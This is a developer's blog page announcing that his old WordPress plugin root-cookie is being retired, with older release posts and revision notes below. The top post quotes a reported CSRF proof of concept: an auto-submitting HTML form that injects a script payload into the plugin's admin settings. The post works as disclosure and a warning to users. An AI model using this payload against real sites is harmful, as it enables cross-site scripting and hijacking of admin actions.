LINICKX.com

Goodbye root-cookie

Nick Bettison — Sat, 14 Dec 2024 15:59:00 +0000

TLDR: 🔥🔥🔥 If you still use root-cookie, please delete it from your WordPress/Website 🔥🔥🔥🔥

Today I have requested that the Plugins team over at WordPress.org org delete my root-cookie plugin. I started it back in 2008 for WP 2.6, probably before if you dig into the SVN history, back when things were very different.

Back in the early days of WordPress, it was a "sub directory", i.e. you setup your site with a home page, and then WordPress (blog) was a below that. The problem root-cookie was designed to solve, is that there was no way of accessing the WordPress authentication cookie outside the WordPress folder, so if you wanted to something as simple as change a banner, or theme based on being logged in, you could't. root-cookie was very simple, it hooked into WordPress's authentication functions and stripped the folder out of the cookie, and assigned it to the "root" of the domain, then from your custom code you could read it and do whatever.

I really, really cannot remember what the admin page did or looked like, there's probably some screenshots around here but apparently it contains a Cross Site Request Forgery (CSRF) vulnerability, the steps (apparently, I've not tested) to reproduce are:

Make a logged in admin click a link with the following HTML (replace the domain)

<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
<form action="http://{domain}/wp-admin/options-general.php?page=root-cookie" method="POST">
<input type="hidden" name="rootcookie_submit_hidden" value='Y' />
<input type="hidden" name="rootcookie_subdomain_manual" value='&"><script>alert(1)</script>' />
</form>
</body>
</html>

REF: https://patchstack.com/

👉🏻 Given that I have not maintained this plugin for over 13 years, I do NOT intend to publish an update and have requested the plugin be deleted.

From: Nick
To: plugins wordpress.org
Date: 14 Dec 2024, 15:47
Subject: Please Delete "root-cookie"
Body:

Hello, Please delete https://wordpress.org/plugins/root-cookie/

The plugin has not been maintained in 13years, apparently recently it was discovered to contain a CSRF vulnerability, I do not intend to fix it therefore it would be safer for the community if the plugin is removed from wordpress.org.

Stats show only 11 downloads per week, I don't suppose the plugin is needed anymore, the first version was released in 2008 for WP2.6, I expect a lot has changed since then :)

Many Thanks in advance for your support.
Kind Regards,
Nick

Example wordpress_logged_in for root-cookie

nick — Wed, 24 Jul 2013 21:36:00 +0100

https://gist.github.com/linickx/6074260

Making your WordPress.org/extend/plugin pages look cool!

nick — Fri, 09 Mar 2012 08:38:00 +0000

Whilst browsing what is on offer at wordpress.org/extend I noticed that the plugins by automattic had fancy banners (e.g. jetpack & buddypress)... I wanted in!

Since the text on these pages is generated from the readme.txt in a given plugin's repo I figured I'd take a look there and see if the automattic guys were doing anything different... oh yeah, there were!

These repo's had a "assets" folder in the root, and in there was a banner-772x250.png. Simply by generating my own banner (772px wide by 250px high), creating an assets folder in each of my repos and committing did the trick - so secret sauce required! (NOTE:You have to wait a while for wp.org to update, I waited overnight)

I think these are looking rather groovy :)

Revision 514956: banner test - got root?

nick — Mon, 05 Mar 2012 22:09:00 +0000

Revision 514956: banner test - got root?

root-cookie 1.6, two years in the making?

nick — Thu, 22 Dec 2011 22:02:00 +0000

No taking two years to release an update is not good, but in my defence root-cookie is so simple that there are very few issues and complaints ;)

Actually a two year wait isn't strictly true, those watching the dev log would have seen I've pushed the odd update here and there.

So what prompts this release, well I've noticed that in WP3.3 that the cookie functions have changed, so to ensure future compatibility (and minimal issues for me) I have updated this plugin to be aligned to the core source.

The usual blurb...

ChangeLog

Contextual Help
Bug fix "undefined method WP_Error::get_items"
Logout Enhancement
WP 3.3 Compatability
Donation Link (it's good for your karma)

Revision 479559: 1.6 is good to go!

nick — Thu, 22 Dec 2011 22:00:00 +0000

Revision 479559: 1.6 is good to go!

Revision 479535: Updated readme for wp.org validation

nick — Thu, 22 Dec 2011 21:12:00 +0000

Revision 479535: Updated readme for wp.org validation

Revision 479519: logout upgrade (better cookie clearing)

nick — Thu, 22 Dec 2011 20:58:00 +0000

Revision 479519: logout upgrade (better cookie clearing)

Revision 478889: WFM: WP 3.3

nick — Wed, 21 Dec 2011 21:25:00 +0000

Revision 478889: WFM: WP 3.3

Revision 478864: Sync code with WordPress 3.3

nick — Wed, 21 Dec 2011 21:00:00 +0000

Revision 478864: Sync code with WordPress 3.3